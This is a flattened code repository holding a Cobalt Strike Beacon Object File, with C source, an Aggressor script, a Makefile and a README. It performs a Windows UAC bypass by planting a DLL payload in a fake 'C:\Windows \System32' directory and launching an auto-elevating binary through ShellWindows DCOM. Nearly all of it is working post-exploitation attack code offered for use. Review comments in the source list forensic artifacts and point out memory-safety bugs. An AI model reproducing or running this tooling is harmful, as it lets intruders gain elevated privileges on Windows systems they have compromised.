├── Makefile ├── README.md ├── beacon.h ├── execution.png ├── trustedpath-uacbypass.c ├── trustedpath-uacbypass.cna └── trustedpath-uacbypass.x64.o /Makefile: -------------------------------------------------------------------------------- 1 | BOF_Function := trustedpath-uacbypass 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | all: 4 | $(CC_x64) -o $(BOF_Function).x64.o -c $(BOF_Function).c 5 | 6 | clean: 7 | rm $(BOF_Function).o 8 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # BOF - Trusted Path UAC Bypass 2 | Beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving "cmd.exe" by using DCOM object. 3 | 4 | Technical details: 5 | 6 | https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows 7 | 8 | **Usage** 9 | 10 | `Example: bof-trustedpath-uacbypass ComputerDefaults.exe /root/edputil.dll` 11 | 12 | **Compile** 13 | 14 | `make` 15 | 16 | **Execution** 17 | ``` 18 | beacon> help bof-trustedpath-uacbypass 19 | Version: 1.0 20 | Author: Chris Au 21 | Twitter: @netero_1010 22 | Github: @netero1010 23 | 24 | ====================Trusted Path UAC Bypass BOF Workflow======================= 25 | Step 1: Upload the DLL payload to "C:\Windows\Tasks" 26 | Step 2: Create a new folder called "C:\Windows \System32" 27 | Step 3: Copy desired executable to "C:\Windows \System32" 28 | Step 4: Copy the DLL payload to "C:\Windows \System32" 29 | Step 5: Use DCOM to execute "C:\Windows \System32\" 30 | Step 6: Delete the DLL payload on "C:\Windows\Tasks" 31 | ================================================================================ 32 | 33 | Example: bof-trustedpath-uacbypass ComputerDefaults.exe /root/edputil.dll 34 | ``` 35 | 36 | ![HowTo](https://github.com/netero1010/TrustedPath-UACBypass-BOF/raw/main/execution.png) 37 | 38 | **Credit** 39 | @David Wells and @Wietze for excellent 
research 40 | https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e 41 | https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows 42 | 43 | @Yas_o_h for the awesome DCOM BOF implementation 44 | https://github.com/Yaxser/CobaltStrike-BOF/tree/master/DCOM%20Lateral%20Movement 45 | -------------------------------------------------------------------------------- /beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char * original; /* the original buffer [so we can free it] */ 13 | char * buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 22 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char * original; /* the original buffer [so we can free it] */ 27 | char * buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 
37 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | 49 | /* Token Functions */ 50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 51 | DECLSPEC_IMPORT void BeaconRevertToken(); 52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 53 | 54 | /* Spawn+Inject Functions */ 55 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 59 | 60 | /* Utility Functions */ 61 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 62 | -------------------------------------------------------------------------------- /execution.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/netero1010/TrustedPath-UACBypass-BOF/b7ffbd5678cec2fb3031e0bb31dce42448a7c29a/execution.png -------------------------------------------------------------------------------- /trustedpath-uacbypass.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "beacon.h" 9 | 10 | DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$CreateDirectoryW(LPCTSTR, LPSECURITY_ATTRIBUTES); 11 | DECLSPEC_IMPORT WINBASEAPI BOOL 
WINAPI KERNEL32$CopyFileW(LPCTSTR, LPCTSTR, BOOL); 12 | DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$DeleteFileW(LPCTSTR); 13 | DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI SHLWAPI$PathFileExistsW(LPCTSTR); 14 | WINBASEAPI wchar_t WINAPI MSVCRT$wcscat(wchar_t * destination, const wchar_t * source); 15 | DECLSPEC_IMPORT WINBASEAPI DWORD WINAPI KERNEL32$GetLastError(void); 16 | DECLSPEC_IMPORT WINOLEAPI OLE32$CoInitialize(LPVOID pvReserved); 17 | DECLSPEC_IMPORT WINOLEAPI OLE32$CLSIDFromString(LPCOLESTR lpsz, LPCLSID pclsid); 18 | DECLSPEC_IMPORT WINOLEAPI OLE32$CoCreateInstanceEx(REFCLSID, IUnknown*,DWORD,COSERVERINFO*, DWORD,MULTI_QI*); 19 | DECLSPEC_IMPORT WINBASEAPI void * WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); 20 | DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap(); 21 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString(wchar_t * lpsz, LPIID lpiid); 22 | DECLSPEC_IMPORT WINOLEAPI_(void) OLE32$CoUninitialize(void); 23 | DECLSPEC_IMPORT WINOLEAUTAPI_(BSTR) OleAut32$SysAllocString(const OLECHAR *); 24 | 25 | void go(char * args, int alen) 26 | {
/*
 * BOF entry point, invoked by the .cna alias through beacon_inline_execute.
 * `args`/`alen` carry two packed strings (bof_pack "ZZ" in the .cna): the
 * target executable name and the DLL file name. Both are read back with
 * BeaconDataExtract and used as wide strings.
 *
 * Host artifacts produced by this function (relevant for detection and
 * forensic review):
 *   - the directory "C:\Windows \System32" (trailing space after "Windows"),
 *     created through the \\?\ path prefix so the trailing space is kept;
 *   - a copy of C:\Windows\System32\<targetProc> and of
 *     C:\Windows\Tasks\<DLL> inside that directory;
 *   - a local DCOM activation of CLSID {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
 *     (ShellWindows) followed by IShellDispatch2::ShellExecute of the copied
 *     executable with the "open" verb and SW_HIDE.
 * FileCleanup deletes only C:\Windows\Tasks\<DLL>; the mock directory and the
 * two copied files are left on disk.
 *
 * NOTE(review): the four path buffers hold 100 wchar_t each and neither
 * targetProc nor DLL is length-checked before MSVCRT$wcscat appends it.
 */
27 | // Initialize variables 28 | wchar_t originalLocation[100] = {0}; 29 | wchar_t newLocation[100] = {0}; 30 | wchar_t originalDLLLocation[100] = {0}; 31 | wchar_t newDLLLocation[100] = {0}; 32 | datap parser; 33 | DWORD errorcode; 34 | BeaconDataParse(&parser, args, alen); 35 | wchar_t* targetProc = (wchar_t*)BeaconDataExtract(&parser, NULL); 36 | wchar_t* DLL = (wchar_t*)BeaconDataExtract(&parser, NULL);; 37 | MSVCRT$wcscat(originalLocation, L"C:\\Windows\\System32\\"); 38 | MSVCRT$wcscat(originalLocation, targetProc); 39 | MSVCRT$wcscat(newLocation, L"C:\\Windows \\System32\\"); 40 | MSVCRT$wcscat(originalDLLLocation, L"C:\\Windows\\Tasks\\"); 41 | MSVCRT$wcscat(originalDLLLocation, DLL); 42 | MSVCRT$wcscat(newDLLLocation, L"C:\\Windows \\System32\\"); 43 | MSVCRT$wcscat(newDLLLocation, DLL); 44 | MSVCRT$wcscat(newLocation, targetProc); 45 | 46 | // Check if file exists 47
| if(!SHLWAPI$PathFileExistsW((LPCTSTR)originalLocation)){ 48 | BeaconPrintf(CALLBACK_ERROR, "The target executable does not exist in \"C:\\Windows\\System32\"."); 49 | goto FileCleanup; 50 | return; 51 | } 52 | 53 | // Create "C:\Windows \System32" directory 54 | KERNEL32$CreateDirectoryW((LPCTSTR)L"\\\\?\\C:\\Windows \\", 0); 55 | KERNEL32$CreateDirectoryW((LPCTSTR)L"\\\\?\\C:\\Windows \\System32\\", 0); 56 | 57 | // Copy the DLL payload and target executable to "C:\Windows \System32" 58 | BeaconPrintf(CALLBACK_OUTPUT, "Copying file from \"%ls\" to \"%ls\".", originalLocation, newLocation); 59 | KERNEL32$CopyFileW((LPCTSTR)originalLocation, (LPCTSTR)newLocation, FALSE); 60 | errorcode = KERNEL32$GetLastError();
/* NOTE(review): the BOOL returned by CopyFileW is discarded here and again for
 * the DLL copy below; the outcome is inferred from GetLastError(), whose value
 * is only defined after a failed call. 32 is ERROR_SHARING_VIOLATION. Every
 * `return` that follows a `goto FileCleanup` in this function is unreachable. */
61 | if(errorcode!=0){ 62 | if(errorcode==32){ 63 | BeaconPrintf(CALLBACK_ERROR, "Error %d: Could not copy the executable to the destination because it is running by another program. Please kill the process and retry.", KERNEL32$GetLastError()); 64 | }else{ 65 | BeaconPrintf(CALLBACK_ERROR, "Error %d: Could not copy the executable to the destination.", KERNEL32$GetLastError()); 66 | } 67 | goto FileCleanup; 68 | return; 69 | }else{ 70 | BeaconPrintf(CALLBACK_OUTPUT, "Executable copied successfully."); 71 | } 72 | KERNEL32$CopyFileW((LPCTSTR)originalDLLLocation, (LPCTSTR)newDLLLocation, FALSE); 73 | if(KERNEL32$GetLastError()!=0){ 74 | BeaconPrintf(CALLBACK_ERROR, "Error %d: Could not copy the DLL payload to the destination.", KERNEL32$GetLastError()); 75 | goto FileCleanup; 76 | return; 77 | }else{ 78 | BeaconPrintf(CALLBACK_OUTPUT, "DLL payload copied successfully."); 79 | } 80 | 81 | // The full DCOM execution all credit to @Yas_o_h for his DCOM BOF implementation (https://raw.githubusercontent.com/Yaxser/CobaltStrike-BOF/6fe9cc139632c8301c207ea27e4859d7224418b9/DCOM%20Lateral%20Movement/BOF-IShellWindows-DCOM.c) 82 | HRESULT hr = S_OK; 83 | IID Ipsb, Ipsv, Ipsw, Ipsfvd, Ipdisp, IpdispBackground, ISHLDISP, IshellWindowCLSID, ITopLevelSID,
servicerprovider_iid; 84 | HWND hwnd; 85 | IShellBrowser* psb; 86 | IShellView* psv; 87 | IShellWindows* psw; 88 | IShellFolderViewDual* psfvd; 89 | IShellDispatch2* psd; 90 | IDispatch* pdisp, * pdispBackground; 91 | IServiceProvider* svsProvider; 92 | VARIANT vEmpty = { vEmpty.vt = VT_I4, vEmpty.lVal = 0 };
/* vEmpty (VT_I4, 0) is passed twice to FindWindowSW below as the location
 * arguments. NOTE(review): psb, psv, psw, psfvd, psd, pdisp, pdispBackground
 * and svsProvider are declared without initializers, yet the Cleanup label
 * tests each one against NULL; an early `goto Cleanup` reads indeterminate
 * pointer values. */
93 | 94 | hr = OLE32$CoInitialize(NULL); 95 | if (!SUCCEEDED(hr)) { 96 | BeaconPrintf(CALLBACK_ERROR, "CoInitialize failed: 0x%08lx", hr); 97 | goto FileCleanup; 98 | return; 99 | } 100 | 101 | wchar_t* ShellBrowserI = L"{000214E2-0000-0000-C000-000000000046}"; 102 | wchar_t* ShellViewI = L"{000214E3-0000-0000-C000-000000000046}"; 103 | wchar_t* ShellWindowsI = L"{85CB6900-4D95-11CF-960C-0080C7F4EE85}"; 104 | wchar_t* ShellFolderViewDualI = L"{E7A1AF80-4D96-11CF-960C-0080C7F4EE85}"; 105 | wchar_t* Dispatch_I = L"{00020400-0000-0000-C000-000000000046}"; 106 | wchar_t* ShellDispatch_I = L"{A4C6892C-3BA9-11D2-9DEA-00C04FB16162}"; 107 | wchar_t* ShellWindowCLSID = L"{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"; 108 | wchar_t* TopLevelBrowserSID = L"{4C96BE40-915C-11CF-99D3-00AA004AE837}"; 109 | wchar_t* ServiceProviderI = L"{6D5140C1-7436-11CE-8034-00AA006009FA}"; 110 | 111 | OLE32$IIDFromString(ShellBrowserI, &Ipsb); 112 | OLE32$IIDFromString(ShellViewI, &Ipsv); 113 | OLE32$IIDFromString(ShellWindowsI, &Ipsw); 114 | OLE32$IIDFromString(ShellFolderViewDualI, &Ipsfvd); 115 | OLE32$IIDFromString(ShellFolderViewDualI, &IpdispBackground);
/* NOTE(review): IpdispBackground receives the IShellFolderViewDual IID (same
 * as Ipsfvd) and is not referenced again in this function. None of the
 * IIDFromString/CLSIDFromString results are checked. */
116 | OLE32$IIDFromString(Dispatch_I, &Ipdisp); 117 | OLE32$IIDFromString(ShellDispatch_I, &ISHLDISP); 118 | OLE32$CLSIDFromString(ShellWindowCLSID, &IshellWindowCLSID); 119 | OLE32$CLSIDFromString(TopLevelBrowserSID, &ITopLevelSID); 120 | OLE32$IIDFromString(ServiceProviderI, &servicerprovider_iid); 121 | 122 | const GUID GUID_NULL = { 0, 0, 0, { 0, 0, 0, 0, 0, 0, 0, 0 } };
/* NOTE(review): GUID_NULL (here) and authidentity (below) are declared but
 * never used. */
123 | 124 | COSERVERINFO* srvinfo = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(COSERVERINFO)); 125 | COAUTHINFO* authInfo =
KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(COAUTHINFO)); 126 | COAUTHIDENTITY* authidentity = NULL; 127 | MULTI_QI mqi[1] = { &Ipsw, NULL, hr };
/* mqi asks CoCreateInstanceEx for IShellWindows; pItf is filled in on success.
 * srvinfo->pwszName is never set (left NULL by HEAP_ZERO_MEMORY), so together
 * with CLSCTX_LOCAL_SERVER the activation is on the local machine.
 * NOTE(review): both HeapAlloc results are used without a NULL check and are
 * never freed. */
128 | 129 | authInfo->dwAuthnSvc = RPC_C_AUTHN_WINNT; 130 | authInfo->dwAuthzSvc = RPC_C_AUTHZ_NONE; 131 | authInfo->pwszServerPrincName = NULL; 132 | authInfo->dwAuthnLevel = RPC_C_AUTHN_LEVEL_DEFAULT; 133 | authInfo->dwImpersonationLevel = RPC_C_IMP_LEVEL_IMPERSONATE; 134 | authInfo->dwCapabilities = EOAC_NONE; 135 | srvinfo->dwReserved1 = 0; 136 | srvinfo->dwReserved2 = 0; 137 | srvinfo->pAuthInfo = authInfo; 138 | 139 | hr = OLE32$CoCreateInstanceEx(&IshellWindowCLSID, NULL, CLSCTX_LOCAL_SERVER, srvinfo, 1, mqi); 140 | 141 | if(!SUCCEEDED(hr)){ 142 | BeaconPrintf(CALLBACK_ERROR, "CoCreateInstanceEx failed: 0x%08lx", hr); 143 | goto FileCleanup; 144 | return; 145 | } 146 | 147 | hr = mqi->pItf->lpVtbl->QueryInterface(mqi->pItf, &Ipsw, (void**)&psw); 148 | 149 | if(!SUCCEEDED(hr)){ 150 | BeaconPrintf(CALLBACK_ERROR, "ShellWindows->QueryInterface failed: 0x%08lx", hr); 151 | goto Cleanup; 152 | goto FileCleanup; 153 | return; 154 | } 155 | 156 | hr = mqi->pItf->lpVtbl->Release(mqi->pItf);
/* NOTE(review): Release returns the remaining reference count, not an
 * HRESULT, so the SUCCEEDED test below is not meaningful. pItf is also not
 * set to NULL here, so the `if(mqi->pItf != NULL)` branch at Cleanup releases
 * it a second time. */
157 | 158 | if(!SUCCEEDED(hr)){ 159 | BeaconPrintf(CALLBACK_ERROR, "Releaseing IShellWindows failed: 0x%08lx", hr); 160 | goto Cleanup; 161 | goto FileCleanup; 162 | return; 163 | } 164 | 165 | hr = psw->lpVtbl->FindWindowSW(psw, &vEmpty, &vEmpty, SWC_DESKTOP, (long*)&hwnd, SWFO_NEEDDISPATCH, &pdisp); 166 | 167 | if(!SUCCEEDED(hr)){ 168 | BeaconPrintf(CALLBACK_ERROR, "FindWindowSW failed: 0x%08lx", hr); 169 | goto Cleanup; 170 | goto FileCleanup; 171 | return; 172 | } 173 | 174 | hr = pdisp->lpVtbl->QueryInterface(pdisp, &servicerprovider_iid, (void**)&svsProvider); 175 | if(!SUCCEEDED(hr)){ 176 | BeaconPrintf(CALLBACK_ERROR, "pdisp->QueryInterface failed: 0x%08lx", hr); 177 | goto Cleanup; 178 | goto FileCleanup; 179 | return; 180 | } 181 | 182 | hr = svsProvider->lpVtbl->QueryService(svsProvider,
&ITopLevelSID, &Ipsb, (void**)&psb); 183 | if(!SUCCEEDED(hr)){ 184 | BeaconPrintf(CALLBACK_ERROR, "pdisp->QueryInterface failed: 0x%08lx", hr);
/* NOTE(review): this message names pdisp->QueryInterface, but the call that
 * failed is svsProvider->QueryService. */
185 | goto Cleanup; 186 | goto FileCleanup; 187 | return; 188 | } 189 | 190 | hr = psb->lpVtbl->QueryActiveShellView(psb, &psv); 191 | if(!SUCCEEDED(hr)){ 192 | BeaconPrintf(CALLBACK_ERROR, "psb->QueryActiveShellView failed: 0x%08lx", hr); 193 | goto Cleanup; 194 | goto FileCleanup; 195 | return; 196 | } 197 | 198 | hr = psv->lpVtbl->GetItemObject(psv, SVGIO_BACKGROUND, &Ipdisp, (void**)&pdispBackground); 199 | if(!SUCCEEDED(hr)){ 200 | BeaconPrintf(CALLBACK_ERROR, "psv->GetItemObject failed: 0x%08lx", hr); 201 | goto Cleanup; 202 | goto FileCleanup; 203 | return; 204 | } 205 | 206 | hr = pdispBackground->lpVtbl->QueryInterface(pdispBackground, &Ipsfvd, (void**)&psfvd); 207 | if(!SUCCEEDED(hr)){ 208 | BeaconPrintf(CALLBACK_ERROR, "pdispBackground->QueryInterface failed: 0x%08lx", hr); 209 | goto Cleanup; 210 | goto FileCleanup; 211 | return; 212 | } 213 | 214 | hr = psfvd->lpVtbl->get_Application(psfvd, &pdisp); 215 | if(!SUCCEEDED(hr)){ 216 | BeaconPrintf(CALLBACK_ERROR, "psfvd->get_Application failed: 0x%08lx", hr); 217 | goto Cleanup; 218 | goto FileCleanup; 219 | return; 220 | } 221 | 222 | hr = pdisp->lpVtbl->QueryInterface(pdisp, &ISHLDISP, (void**)&psd); 223 | if(!SUCCEEDED(hr)){ 224 | BeaconPrintf(CALLBACK_ERROR, "pdisp->QueryInterface failed: 0x%08lx", hr); 225 | goto Cleanup; 226 | goto FileCleanup; 227 | return; 228 | } 229 | 230 | BeaconPrintf(CALLBACK_OUTPUT, "Executing \"%ls\"...", newLocation); 231 | BSTR bstrFile = OleAut32$SysAllocString(newLocation); 232 | 233 | VARIANT vOperation; 234 | vOperation.vt = VT_BSTR; 235 | vOperation.bstrVal = OleAut32$SysAllocString(L"open"); 236 | 237 | VARIANT vShow; 238 | vShow.vt = VT_INT; 239 | vShow.intVal = SW_HIDE; 240 | 241 | VARIANT vArgs; 242 | vArgs.vt = VT_BSTR; 243 | vArgs.bstrVal = OleAut32$SysAllocString(L""); 244 | 245 | VARIANT vDir; 246 | vDir.vt = VT_BSTR;
247 | vDir.bstrVal = OleAut32$SysAllocString(L""); 248 | 249 | psd->lpVtbl->ShellExecute(psd, bstrFile, vArgs, vDir, vOperation, vShow);
/* NOTE(review): the HRESULT of ShellExecute is not assigned to hr, so the
 * SUCCEEDED test below re-examines the previous QueryInterface result and a
 * ShellExecute failure is never reported. The four BSTRs allocated with
 * SysAllocString are never freed. The `goto FileCleanup` after `goto Cleanup`
 * at 255 is unreachable; Cleanup falls through into FileCleanup anyway. */
250 | if(!SUCCEEDED(hr)){ 251 | BeaconPrintf(CALLBACK_ERROR, "psd->ShellExecute failed: 0x%08lx", hr); 252 | } 253 | 254 | goto Cleanup; 255 | goto FileCleanup; 256 | 257 | Cleanup: 258 | if(mqi->pItf != NULL){ 259 | mqi->pItf->lpVtbl->Release(mqi->pItf); 260 | } 261 | if(psb != NULL){ 262 | psb->lpVtbl->Release(psb); 263 | } 264 | if(psv != NULL){ 265 | psv->lpVtbl->Release(psv); 266 | } 267 | if(psw != NULL){ 268 | psw->lpVtbl->Release(psw); 269 | } 270 | if(psfvd != NULL){ 271 | psfvd->lpVtbl->Release(psfvd); 272 | } 273 | if(pdisp != NULL){ 274 | pdisp->lpVtbl->Release(pdisp); 275 | } 276 | if(pdispBackground != NULL){ 277 | pdispBackground->lpVtbl->Release(pdispBackground); 278 | } 279 | if(svsProvider != NULL){ 280 | svsProvider->lpVtbl->Release(svsProvider); 281 | } 282 | if(psd != NULL){ 283 | psd->lpVtbl->Release(psd); 284 | } 285 | OLE32$CoUninitialize(); 286 | 287 | FileCleanup:
/* Reached on every exit path. Only the DLL uploaded to C:\Windows\Tasks is
 * removed; the "C:\Windows \System32" directory and the copies placed in it
 * remain. NOTE(review): the DeleteFileW result is not checked, so the
 * "deleted successfully" message is printed unconditionally. */
288 | BeaconPrintf(CALLBACK_OUTPUT, "Cleaning up..."); 289 | KERNEL32$DeleteFileW((LPCTSTR)originalDLLLocation); 290 | BeaconPrintf(CALLBACK_OUTPUT, "DLL payload in the \"C:\\Windows\\Tasks\" deleted successfully."); 291 | }; 292 | -------------------------------------------------------------------------------- /trustedpath-uacbypass.cna: -------------------------------------------------------------------------------- 1 | # Credit to @Yas_o_h for his awesome DCOM BOF implementation 2 | 3 | beacon_command_register("bof-trustedpath-uacbypass", "BOF implementation for trusted path UAC bypass", 4 | " 5 | Version: 1.0 6 | Author: Chris Au 7 | Twitter: @netero_1010 8 | Github: @netero1010 9 | 10 | ====================Trusted Path UAC Bypass BOF Workflow======================= 11 | Step 1: Upload the DLL payload to \"C:\\Windows\\Tasks\" 12 | Step 2: Create a new folder called \"C:\\Windows \\System32\" 13 | Step 3: Copy desired executable to 
\"C:\\Windows \\System32\" 14 | Step 4: Copy the DLL payload to \"C:\\Windows \\System32\" 15 | Step 5: Use DCOM to execute \"C:\\Windows \\System32\\\" 16 | Step 6: Delete the DLL payload on \"C:\\Windows\\Tasks\" 17 | ================================================================================ 18 | 19 | Example: bof-trustedpath-uacbypass ComputerDefaults.exe /root/edputil.dll"); 20 | 21 | alias bof-trustedpath-uacbypass { 22 | local('$args'); 23 | $barch = barch($1); 24 | if(size(@_) < 3){ 25 | berror($1, "Missing arugment. Example: bof-trustedpath-uacbypass ComputerDefaults.exe /root/edputil.dll"); 26 | return; 27 | } 28 | $targetProc = split("\\\\", $2)[-1]; 29 | $DLL = $3; 30 | $DLLFileName = split("\\\\", $DLL)[-1]; 31 | $DLLFileName = split("/", $DLLFileName)[-1]; 32 | $DLLhandle = openf($DLL); 33 | $DLLdata = readb($DLLhandle, -1); 34 | if(strlen($DLLdata) == 0){ 35 | berror($1, "File is empty or not exit. Please use a valid file."); 36 | return; 37 | } 38 | bupload_raw!($1, "C:\\Windows\\Tasks\\" . $DLLFileName, $DLLdata); 39 | closef($DLLhandle); 40 | blog($1, "Dropped DLL payload to \"C:\\Windows\\Tasks\" folder."); 41 | $args = bof_pack($1, "ZZ", $targetProc, $DLLFileName); 42 | $handle = openf(script_resource("trustedpath-uacbypass. $+ $barch $+ .o")); 43 | $data = readb($handle, -1); 44 | closef($handle); 45 | beacon_inline_execute($1, $data, "go", $args); 46 | } 47 | -------------------------------------------------------------------------------- /trustedpath-uacbypass.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/netero1010/TrustedPath-UACBypass-BOF/b7ffbd5678cec2fb3031e0bb31dce42448a7c29a/trustedpath-uacbypass.x64.o --------------------------------------------------------------------------------